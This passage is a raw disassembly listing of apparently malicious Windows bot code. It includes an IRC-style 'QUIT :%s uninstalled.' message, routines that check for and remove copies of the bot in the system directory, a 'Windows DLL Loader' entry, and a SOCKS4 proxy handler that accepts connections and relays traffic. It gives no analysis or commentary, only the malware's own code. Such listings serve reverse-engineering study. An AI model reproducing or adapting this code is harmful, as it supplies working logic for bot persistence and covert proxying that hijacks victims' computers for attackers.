lea eax, [ebp+var_324]
push eax
call sub_406CF8
pop ecx
push eax
call sub_406D90
pop ecx
push 44h
push 0
lea eax, [ebp+var_368]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_368], 44h
and [ebp+var_338], 0
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_368]
push eax
push 0
push 0
push 28h
push 1
push 0
push 0
lea eax, [ebp+var_118]
push eax
push 0
call ds:dword_41707C ; CreateProcessA
call ds:dword_417254 ; WSACleanup
push 0
call sub_416BFC ; exit
locret_407146: ; CODE XREF: sub_406E8E+165�j
; sub_406E8E+21C�j
leave
retn
sub_406E8E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407148 proc near ; CODE XREF: sub_402A32+7BB�p
; sub_40A9CF+145F�p ...
var_20C = byte ptr -20Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 20Ch
call sub_406D47
push 104h
lea eax, [ebp+var_20C]
push eax
push 0
call ds:dword_41708C ; GetModuleHandleA
push eax
call ds:dword_417090 ; GetModuleFileNameA
and [ebp+var_108], 0
jmp short loc_407187
; ---------------------------------------------------------------------------
loc_40717A: ; CODE XREF: sub_407148:loc_4072DB�j
mov eax, [ebp+var_108]
inc eax
mov [ebp+var_108], eax
loc_407187: ; CODE XREF: sub_407148+30�j
mov eax, [ebp+var_108]
shl eax, 1
cmp ds:off_418B88[eax*4], 0
jz loc_4072E0
push 104h
lea eax, [ebp+var_104]
push eax
call ds:dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_104]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push ds:off_418B88[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push ds:off_418B88[eax*4]
lea eax, [ebp+var_104]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push ds:off_418B88[eax*4]
call sub_4105AD
pop ecx
lea eax, [ebp+var_20C]
push eax
lea eax, [ebp+var_104]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_4072DB
mov eax, [ebp+var_108]
shl eax, 1
push ds:off_418B88[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push ds:off_418B8C[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push ds:off_418B88[eax*4]
mov eax, [ebp+var_108]
shl eax, 1
push ds:off_418B8C[eax*4]
push 0
call sub_406C51
add esp, 0Ch
mov eax, [ebp+var_108]
shl eax, 1
push ds:off_418B88[eax*4]
call sub_4105AD
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push ds:off_418B8C[eax*4]
call sub_4105AD
pop ecx
lea eax, [ebp+var_20C]
push eax
call sub_406CF8
pop ecx
push eax
call sub_406D90
pop ecx
test eax, eax
jz short loc_4072D9
push offset dword_41EBFC
push offset aQuitSUninstall ; "QUIT :%s uninstalled."
call sub_40D6CB
pop ecx
pop ecx
call ds:dword_417254 ; WSACleanup
push 0
call ds:dword_41705C ; ExitProcess
loc_4072D9: ; CODE XREF: sub_407148+170�j
jmp short locret_40732B
; ---------------------------------------------------------------------------
loc_4072DB: ; CODE XREF: sub_407148+D8�j
jmp loc_40717A
; ---------------------------------------------------------------------------
loc_4072E0: ; CODE XREF: sub_407148+4F�j
push offset dword_41EBFC
push offset aWindowsDllLoad ; "Windows DLL Loader"
push 0
call sub_406C51
add esp, 0Ch
lea eax, [ebp+var_20C]
push eax
call sub_406CF8
pop ecx
push eax
call sub_406D90
pop ecx
test eax, eax
jz short locret_40732B
push offset dword_41EBFC
push offset aQuitSUninstall ; "QUIT :%s uninstalled."
call sub_40D6CB
pop ecx
pop ecx
call ds:dword_417254 ; WSACleanup
push 0
call ds:dword_41705C ; ExitProcess
locret_40732B: ; CODE XREF: sub_407148:loc_4072D9�j
; sub_407148+1C2�j
leave
retn
sub_407148 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40732D proc near ; DATA XREF: sub_40764D+145�o
var_16F0 = dword ptr -16F0h
var_16EC = dword ptr -16ECh
var_16E8 = dword ptr -16E8h
var_16E4 = dword ptr -16E4h
var_16E0 = byte ptr -16E0h
var_6E0 = byte ptr -6E0h
var_5E0 = dword ptr -5E0h
var_5DC = byte ptr -5DCh
var_5D4 = dword ptr -5D4h
var_5D0 = byte ptr -5D0h
var_5CF = byte ptr -5CFh
var_5CE = dword ptr -5CEh
var_5C8 = byte ptr -5C8h
var_1C8 = dword ptr -1C8h
var_1BE = byte ptr -1BEh
var_1AE = byte ptr -1AEh
var_1B = byte ptr -1Bh
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 16F0h
call sub_416BC0
push 1BDh
push [ebp+arg_0]
lea eax, [ebp+var_1C8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
mov eax, [ebp+var_1C8]
mov [ebp+var_5D4], eax
push 0
push 408h
lea eax, [ebp+var_5D0]
push eax
push [ebp+var_5D4]
call ds:dword_417248 ; recv
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_40738F
cmp [ebp+var_8], 0FFFFFFFFh
jnz short loc_407396
loc_40738F: ; CODE XREF: sub_40732D+5A�j
xor eax, eax
jmp locret_407649
; ---------------------------------------------------------------------------
loc_407396: ; CODE XREF: sub_40732D+60�j
movzx eax, [ebp+var_5D0]
cmp eax, 4
jnz short loc_4073BA
movzx eax, [ebp+var_5CF]
cmp eax, 1
jnz short loc_4073BA
mov [ebp+var_16EC], 1
jmp short loc_4073C1
; ---------------------------------------------------------------------------
loc_4073BA: ; CODE XREF: sub_40732D+73�j
; sub_40732D+7F�j
and [ebp+var_16EC], 0
loc_4073C1: ; CODE XREF: sub_40732D+8B�j
mov eax, [ebp+var_16EC]
mov [ebp+var_4], eax
movsx eax, [ebp+var_1BE]
test eax, eax
jz short loc_4073F5
push 10h
lea eax, [ebp+var_1BE]
push eax
lea eax, [ebp+var_5C8]
push eax
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jz short loc_4073F5
and [ebp+var_4], 0
loc_4073F5: ; CODE XREF: sub_40732D+A6�j
; sub_40732D+C2�j
movsx eax, [ebp+var_1B]
test eax, eax
jz short loc_407456
lea eax, [ebp+var_6E0]
push eax
push [ebp+var_5D4]
call sub_4044F7
pop ecx
pop ecx
cmp [ebp+var_4], 0
jz short loc_407423
mov [ebp+var_16F0], offset byte_41DF00
jmp short loc_40742D
; ---------------------------------------------------------------------------
loc_407423: ; CODE XREF: sub_40732D+E8�j
mov [ebp+var_16F0], offset dword_418EEC
loc_40742D: ; CODE XREF: sub_40732D+F4�j
push [ebp+var_16F0]
movzx eax, [ebp+var_5D0]
push eax
lea eax, [ebp+var_6E0]
push eax
push offset dword_418EB8
lea eax, [ebp+var_1AE]
push eax
call sub_40D53F
add esp, 14h
loc_407456: ; CODE XREF: sub_40732D+CE�j
cmp [ebp+var_4], 0
jnz short loc_4074A0
push 8
push 0
lea eax, [ebp+var_5D0]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_5CF], 5Bh
push 8
lea eax, [ebp+var_5D0]
push eax
push [ebp+var_5D4]
call sub_4053BF
add esp, 0Ch
push [ebp+var_5D4]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_407649
; ---------------------------------------------------------------------------
loc_4074A0: ; CODE XREF: sub_40732D+12D�j
push 0Ah
lea eax, [ebp+var_5DC]
push eax
push [ebp+var_5CE]
call ds:dword_417238 ; htons
movzx eax, ax
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
push 2710h
push 0
lea eax, [ebp+var_5DC]
push eax
push [ebp+var_5CE+2]
call ds:dword_41721C ; inet_ntoa
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_5E0], eax
push 8
push 0
lea eax, [ebp+var_5D0]
push eax
call sub_416B6A ; memset
add esp, 0Ch
cmp [ebp+var_5E0], 0
jnz short loc_407537
mov [ebp+var_5CF], 5Bh
push 8
lea eax, [ebp+var_5D0]
push eax
push [ebp+var_5D4]
call sub_4053BF
add esp, 0Ch
push [ebp+var_5D4]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_407649
; ---------------------------------------------------------------------------
loc_407537: ; CODE XREF: sub_40732D+1D7�j
mov [ebp+var_5CF], 5Ah
push 8
lea eax, [ebp+var_5D0]
push eax
push [ebp+var_5D4]
call sub_4053BF
add esp, 0Ch
loc_407555: ; CODE XREF: sub_40732D+2FD�j
push [ebp+var_5D4]
call sub_40447B
pop ecx
test eax, eax
jz short loc_4075BD
push 0
push 1000h
lea eax, [ebp+var_16E0]
push eax
push [ebp+var_5D4]
call ds:dword_417248 ; recv
mov [ebp+var_16E4], eax
cmp [ebp+var_16E4], 0
jz short loc_407597
cmp [ebp+var_16E4], 0FFFFFFFFh
jnz short loc_40759C
loc_407597: ; CODE XREF: sub_40732D+25F�j
jmp loc_40762F
; ---------------------------------------------------------------------------
loc_40759C: ; CODE XREF: sub_40732D+268�j
push [ebp+var_16E4]
lea eax, [ebp+var_16E0]
push eax
push [ebp+var_5E0]
call sub_4053BF
add esp, 0Ch
test eax, eax
jnz short loc_4075BD
jmp short loc_40762F
; ---------------------------------------------------------------------------
loc_4075BD: ; CODE XREF: sub_40732D+236�j
; sub_40732D+28C�j
push [ebp+var_5E0]
call sub_40447B
pop ecx
test eax, eax
jz short loc_407622
push 0
push 1000h
lea eax, [ebp+var_16E0]
push eax
push [ebp+var_5E0]
call ds:dword_417248 ; recv
mov [ebp+var_16E8], eax
cmp [ebp+var_16E8], 0
jz short loc_4075FF
cmp [ebp+var_16E8], 0FFFFFFFFh
jnz short loc_407601
loc_4075FF: ; CODE XREF: sub_40732D+2C7�j
jmp short loc_40762F
; ---------------------------------------------------------------------------
loc_407601: ; CODE XREF: sub_40732D+2D0�j
push [ebp+var_16E8]
lea eax, [ebp+var_16E0]
push eax
push [ebp+var_5D4]
call sub_4053BF
add esp, 0Ch
test eax, eax
jnz short loc_407622
jmp short loc_40762F
; ---------------------------------------------------------------------------
loc_407622: ; CODE XREF: sub_40732D+29E�j
; sub_40732D+2F1�j
push 32h
call ds:dword_41709C ; Sleep
jmp loc_407555
; ---------------------------------------------------------------------------
loc_40762F: ; CODE XREF: sub_40732D:loc_407597�j
; sub_40732D+28E�j ...
push [ebp+var_5D4]
call sub_40538D
pop ecx
push [ebp+var_5E0]
call sub_40538D
pop ecx
xor eax, eax
locret_407649: ; CODE XREF: sub_40732D+64�j
; sub_40732D+16E�j ...
leave
retn 4
sub_40732D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40764D proc near ; DATA XREF: sub_4077DD+B4�o
var_1CC = dword ptr -1CCh
var_1C8 = dword ptr -1C8h
var_1C4 = dword ptr -1C4h
var_1C0 = dword ptr -1C0h
var_1BC = byte ptr -1BCh
var_1B6 = byte ptr -1B6h
var_1A6 = byte ptr -1A6h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1CCh
push 1BDh
push [ebp+arg_0]
lea eax, [ebp+var_1C0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 1
lea eax, [ebp+var_1BC]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_1C4], eax
cmp [ebp+var_1C4], 0
jnz short loc_4076A8
push [ebp+var_1C0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4077D9
; ---------------------------------------------------------------------------
loc_4076A8: ; CODE XREF: sub_40764D+46�j
lea eax, [ebp+var_1BC]
push eax
mov eax, [ebp+var_1C0]
push dword ptr [eax]
push offset dword_418EF8
lea eax, [ebp+var_1A6]
push eax
call sub_40D53F
add esp, 10h
loc_4076CB: ; CODE XREF: sub_40764D+B9�j
; sub_40764D+E1�j ...
push 3E8h
push [ebp+var_1C4]
call sub_4048EF
pop ecx
pop ecx
mov [ebp+var_1C8], eax
mov eax, [ebp+var_1C0]
cmp dword ptr [eax+4], 0
jnz short loc_4076F8
cmp [ebp+var_1C8], 0
jnz short loc_4076FD
loc_4076F8: ; CODE XREF: sub_40764D+A0�j
jmp loc_4077BF
; ---------------------------------------------------------------------------
loc_4076FD: ; CODE XREF: sub_40764D+A9�j
cmp [ebp+var_1C8], 0FFFFFFFFh
jnz short loc_407708
jmp short loc_4076CB
; ---------------------------------------------------------------------------
loc_407708: ; CODE XREF: sub_40764D+B7�j
push 1BDh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_1CC], eax
cmp [ebp+var_1CC], 0
jnz short loc_407730
push [ebp+var_1C8]
call sub_4053B1
pop ecx
jmp short loc_4076CB
; ---------------------------------------------------------------------------
loc_407730: ; CODE XREF: sub_40764D+D3�j
mov eax, [ebp+var_1CC]
mov ecx, [ebp+var_1C8]
mov [eax], ecx
lea eax, [ebp+var_1BC]
push eax
mov eax, [ebp+var_1CC]
add eax, 4
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_1B6]
push eax
mov eax, [ebp+var_1CC]
add eax, 0Ah
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push 1A3h
lea eax, [ebp+var_1A6]
push eax
mov eax, [ebp+var_1CC]
add eax, 1Ah
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+var_1CC]
push offset sub_40732D
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short loc_4077BA
push [ebp+var_1CC]
call sub_416B4C ; free
pop ecx
push [ebp+var_1C8]
call sub_4053B1
pop ecx
loc_4077BA: ; CODE XREF: sub_40764D+153�j
jmp loc_4076CB
; ---------------------------------------------------------------------------
loc_4077BF: ; CODE XREF: sub_40764D:loc_4076F8�j
push [ebp+var_1C4]
call sub_404CBB
pop ecx
push [ebp+var_1C0]
call sub_409763
pop ecx
xor eax, eax
locret_4077D9: ; CODE XREF: sub_40764D+56�j
leave
retn 4
sub_40764D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4077DD proc near ; CODE XREF: sub_40A9CF+17A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
cmp [ebp+arg_4], 0
jnz short loc_40780F
push 0Ah
lea eax, [ebp+var_8]
push eax
push 0FFFFh
push 401h
call sub_4103F5
pop ecx
pop ecx
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
lea eax, [ebp+var_8]
mov [ebp+arg_4], eax
loc_40780F: ; CODE XREF: sub_4077DD+A�j
push 1BDh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_407825
jmp short locret_40789E
; ---------------------------------------------------------------------------
loc_407825: ; CODE XREF: sub_4077DD+44�j
push [ebp+arg_4]
mov eax, [ebp+var_C]
add eax, 4
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
cmp [ebp+arg_8], 0
jz short loc_407844
mov eax, [ebp+arg_8]
mov [ebp+var_10], eax
jmp short loc_40784B
; ---------------------------------------------------------------------------
loc_407844: ; CODE XREF: sub_4077DD+5D�j
mov [ebp+var_10], offset byte_41DF00
loc_40784B: ; CODE XREF: sub_4077DD+65�j
push 10h
push [ebp+var_10]
mov eax, [ebp+var_C]
add eax, 0Ah
push eax
call sub_407A56
add esp, 0Ch
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_C]
add eax, 1Ah
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push offset dword_418F2C
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_C]
push offset sub_40764D
call sub_4095A4
add esp, 14h
locret_40789E: ; CODE XREF: sub_4077DD+46�j
leave
retn
sub_4077DD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4078A0 proc near ; CODE XREF: sub_40A9CF+216�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4078B8
jmp short locret_4078E4
; ---------------------------------------------------------------------------
loc_4078B8: ; CODE XREF: sub_4078A0+14�j
; sub_4078A0:loc_4078E2�j
cmp [ebp+var_4], 0
jnz short loc_4078C0
jmp short locret_4078E4
; ---------------------------------------------------------------------------
loc_4078C0: ; CODE XREF: sub_4078A0+1C�j
mov eax, [ebp+var_4]
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_4078E0
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
and byte ptr [eax], 0
jmp short loc_4078E2
; ---------------------------------------------------------------------------
loc_4078E0: ; CODE XREF: sub_4078A0+33�j
jmp short locret_4078E4
; ---------------------------------------------------------------------------
loc_4078E2: ; CODE XREF: sub_4078A0+3E�j
jmp short loc_4078B8
; ---------------------------------------------------------------------------
locret_4078E4: ; CODE XREF: sub_4078A0+16�j
; sub_4078A0+1E�j ...
leave
retn
sub_4078A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4078E6 proc near ; CODE XREF: sub_407D42+A�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_8], 0
and [ebp+var_4], 0
jmp short loc_4078FC
; ---------------------------------------------------------------------------
loc_4078F5: ; CODE XREF: sub_4078E6:loc_407921�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4078FC: ; CODE XREF: sub_4078E6+D�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407923
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+arg_4]
cmp eax, ecx
jnz short loc_407921
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_407921: ; CODE XREF: sub_4078E6+32�j
jmp short loc_4078F5
; ---------------------------------------------------------------------------
loc_407923: ; CODE XREF: sub_4078E6+21�j
mov eax, [ebp+var_8]
leave
retn
sub_4078E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407928 proc near ; CODE XREF: sub_40E618+2B�p
; sub_40E618+185�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_10], 0
jnz short loc_407963
mov eax, [ebp+arg_10]
shl eax, 2
push eax
push 0
push [ebp+arg_8]
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_10]
shl eax, 2
push eax
push 0
push [ebp+arg_C]
call sub_416B6A ; memset
add esp, 0Ch
xor eax, eax
jmp locret_407A54
; ---------------------------------------------------------------------------
loc_407963: ; CODE XREF: sub_407928+A�j
push [ebp+arg_0]
push [ebp+arg_4]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push [ebp+arg_0]
call sub_40813C
add esp, 0Ch
mov ecx, [ebp+arg_8]
mov [ecx], eax
mov eax, [ebp+arg_C]
mov ecx, [ebp+arg_4]
mov [eax], ecx
mov [ebp+var_8], 1
jmp short loc_4079A1
; ---------------------------------------------------------------------------
loc_40799A: ; CODE XREF: sub_407928:loc_407A4C�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_4079A1: ; CODE XREF: sub_407928+70�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_10]
jge loc_407A51
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_8]
cmp dword ptr [ecx+eax*4-4], 0
jz short loc_407A0A
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push 0
call sub_40813C
add esp, 0Ch
mov ecx, [ebp+var_8]
mov edx, [ebp+arg_8]
mov [edx+ecx*4], eax
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_8]
cmp dword ptr [ecx+eax*4], 0
jz short loc_4079F8
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_8]
mov eax, [ecx+eax*4]
sub eax, [ebp+arg_0]
mov ecx, [ebp+arg_4]
add ecx, eax
mov [ebp+var_C], ecx
jmp short loc_4079FC
; ---------------------------------------------------------------------------
loc_4079F8: ; CODE XREF: sub_407928+B8�j
and [ebp+var_C], 0
loc_4079FC: ; CODE XREF: sub_407928+CE�j
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_C]
mov edx, [ebp+var_C]
mov [ecx+eax*4], edx
jmp short loc_407A4C
; ---------------------------------------------------------------------------
loc_407A0A: ; CODE XREF: sub_407928+90�j
mov eax, [ebp+arg_10]
sub eax, [ebp+var_8]
shl eax, 2
push eax
push 0
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_8]
lea eax, [ecx+eax*4]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_10]
sub eax, [ebp+var_8]
shl eax, 2
push eax
push 0
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_C]
lea eax, [ecx+eax*4]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_8]
dec eax
jmp short locret_407A54
; ---------------------------------------------------------------------------
loc_407A4C: ; CODE XREF: sub_407928+E0�j
jmp loc_40799A
; ---------------------------------------------------------------------------
loc_407A51: ; CODE XREF: sub_407928+7F�j
mov eax, [ebp+arg_10]
locret_407A54: ; CODE XREF: sub_407928+36�j
; sub_407928+122�j
leave
retn
sub_407928 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407A56 proc near ; CODE XREF: sub_401146+6B�p
; sub_401146+CA�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_407A81
cmp ecx, 1
jz short loc_407A7E
loc_407A6E: ; CODE XREF: sub_407A56+26�j
mov al, [esi]
mov [edi], al
test al, al
jz short loc_407A81
inc esi
inc edi
dec ecx
cmp ecx, 1
jnz short loc_407A6E
loc_407A7E: ; CODE XREF: sub_407A56+16�j
mov byte ptr [edi], 0
loc_407A81: ; CODE XREF: sub_407A56+11�j
; sub_407A56+1E�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_407A56 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407A86 proc near ; CODE XREF: sub_4097A7+17�p
; sub_4098F3+17�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_407A97
; ---------------------------------------------------------------------------
loc_407A90: ; CODE XREF: sub_407A86+3A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_407A97: ; CODE XREF: sub_407A86+8�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407AC6
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 30h
jl short loc_407AC2
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 39h
jg short loc_407AC2
jmp short loc_407A90
; ---------------------------------------------------------------------------
loc_407AC2: ; CODE XREF: sub_407A86+2A�j
; sub_407A86+38�j
xor al, al
jmp short locret_407AC8
; ---------------------------------------------------------------------------
loc_407AC6: ; CODE XREF: sub_407A86+1C�j
mov al, 1
locret_407AC8: ; CODE XREF: sub_407A86+3E�j
leave
retn
sub_407A86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407ACA proc near ; CODE XREF: sub_401000+F6�p
; sub_4148CE+61�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push [ebp+arg_8]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_4], eax
and [ebp+var_8], 0
and [ebp+var_C], 0
jmp short loc_407AED
; ---------------------------------------------------------------------------
loc_407AE6: ; CODE XREF: sub_407ACA:loc_407B58�j
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
loc_407AED: ; CODE XREF: sub_407ACA+1A�j
mov eax, [ebp+arg_4]
sub eax, [ebp+var_4]
cmp [ebp+var_C], eax
jg short loc_407B5A
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_8]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jz short loc_407B37
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_8]
movsx ecx, byte ptr [ecx]
add ecx, 20h
cmp eax, ecx
jz short loc_407B37
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_8]
movsx ecx, byte ptr [ecx]
sub ecx, 20h
cmp eax, ecx
jnz short loc_407B58
loc_407B37: ; CODE XREF: sub_407ACA+3F�j
; sub_407ACA+55�j
push [ebp+var_4]
push [ebp+arg_8]
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_407B58
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
jmp short locret_407B5C
; ---------------------------------------------------------------------------
loc_407B58: ; CODE XREF: sub_407ACA+6B�j
; sub_407ACA+84�j
jmp short loc_407AE6
; ---------------------------------------------------------------------------
loc_407B5A: ; CODE XREF: sub_407ACA+2C�j
xor eax, eax
locret_407B5C: ; CODE XREF: sub_407ACA+8C�j
leave
retn
sub_407ACA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407B5E proc near ; CODE XREF: sub_40A2D2+11D�p
; sub_40E943+20�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
jmp short loc_407B70
; ---------------------------------------------------------------------------
loc_407B69: ; CODE XREF: sub_407B5E:loc_407BEE�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_407B70: ; CODE XREF: sub_407B5E+9�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_407B85
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
jmp short locret_407BF3
; ---------------------------------------------------------------------------
loc_407B85: ; CODE XREF: sub_407B5E+1D�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_407BA1
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0Ah
jnz short loc_407BEE
loc_407BA1: ; CODE XREF: sub_407B5E+33�j
and [ebp+var_8], 0
jmp short loc_407BAE
; ---------------------------------------------------------------------------
loc_407BA7: ; CODE XREF: sub_407B5E:loc_407BEC�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_407BAE: ; CODE XREF: sub_407B5E+47�j
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
movsx eax, byte ptr [ecx+eax]
cmp eax, 0Dh
jz short loc_407BD2
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
movsx eax, byte ptr [ecx+eax]
cmp eax, 0Ah
jnz short loc_407BE1
loc_407BD2: ; CODE XREF: sub_407B5E+60�j
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
and byte ptr [ecx+eax], 0
jmp short loc_407BEC
; ---------------------------------------------------------------------------
loc_407BE1: ; CODE XREF: sub_407B5E+72�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
add eax, [ebp+var_8]
jmp short locret_407BF3
; ---------------------------------------------------------------------------
loc_407BEC: ; CODE XREF: sub_407B5E+81�j
jmp short loc_407BA7
; ---------------------------------------------------------------------------
loc_407BEE: ; CODE XREF: sub_407B5E+41�j
jmp loc_407B69
; ---------------------------------------------------------------------------
locret_407BF3: ; CODE XREF: sub_407B5E+25�j
; sub_407B5E+8C�j
leave
retn
sub_407B5E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407BF5 proc near ; CODE XREF: sub_411A09+5D�p
; sub_411A09+F3�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
loc_407BF8: ; CODE XREF: sub_407BF5:loc_407C28�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_0]
inc ecx
mov [ebp+arg_0], ecx
test eax, eax
jz short loc_407C2A
mov eax, [ebp+arg_0]
